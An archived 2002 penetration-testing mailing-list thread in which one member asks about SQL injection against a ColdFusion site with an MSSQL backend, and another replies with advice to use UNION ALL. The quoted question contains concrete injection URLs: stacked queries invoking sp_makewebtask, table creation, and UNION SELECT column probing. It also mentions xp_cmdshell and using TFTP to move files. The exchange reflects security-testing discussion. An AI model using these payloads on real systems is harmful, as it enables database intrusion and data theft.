Penetration Testing mailing list archives
Re: SQL INJECTION IN Coldfusion
From: Cesar <cesarc56 () yahoo com>
Date: Fri, 13 Sep 2002 19:04:37 -0700 (PDT)
Hi. You must use UNION ALL to get all the rows. For new techniques take a look a this paper: Manipulating MS Sql Server using sql injection. http://www.appsecinc.com/news/briefing.html#inject Cesar. --- Mr Ro <vnmrro () yahoo com> wrote:
hello pen-tester, I am dealing with a pen-test agains a CFM server with MSSQL as backend. It is vulnerable with direct SQL injection. I figure out that I can create,drop...table, execute xp_cmdshell, sp_makewebtask, so i submit: submit: http://mysite/file.cfm?id=4546;exec sp_makewebtask "C:\winnt\temp\blah.htm","select * from master..sysmessages"-- it's okay, and I want to get "C:\winnt\temp\blah.htm". I submit: http://mysite/file.cfm?id=4567;create table blah (line varchar(8000))-- and then, I submit: http://mysite/file.cfm?id=4567 UNION SELECT line from mrro-- it returns an error complain that "All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists." so I keep adding "line" in my request url (http://mysite/file.cfm?id=4567 UNION SELECT line,line,line from mrro--), finally it returns an error message like this: "[Microsoft][ODBC SQL Server Driver][SQL Server]The text, ntext, or image data type cannot be selected as DISTINCT." question here: who can explain me what happened ? I know there is another way to download or upload files using "tftp", so is there any free "tftp" server for me to use instead of installing a new one ? thank for reading. best regards mrro __________________________________________________ Do you Yahoo!? Yahoo! News - Today's headlines http://news.yahoo.com
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
__________________________________________________ Do you Yahoo!? Yahoo! News - Today's headlines http://news.yahoo.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Re: SQL INJECTION IN Coldfusion Cesar (Sep 16)
- Re: SQL INJECTION IN Coldfusion wirepair (Sep 18)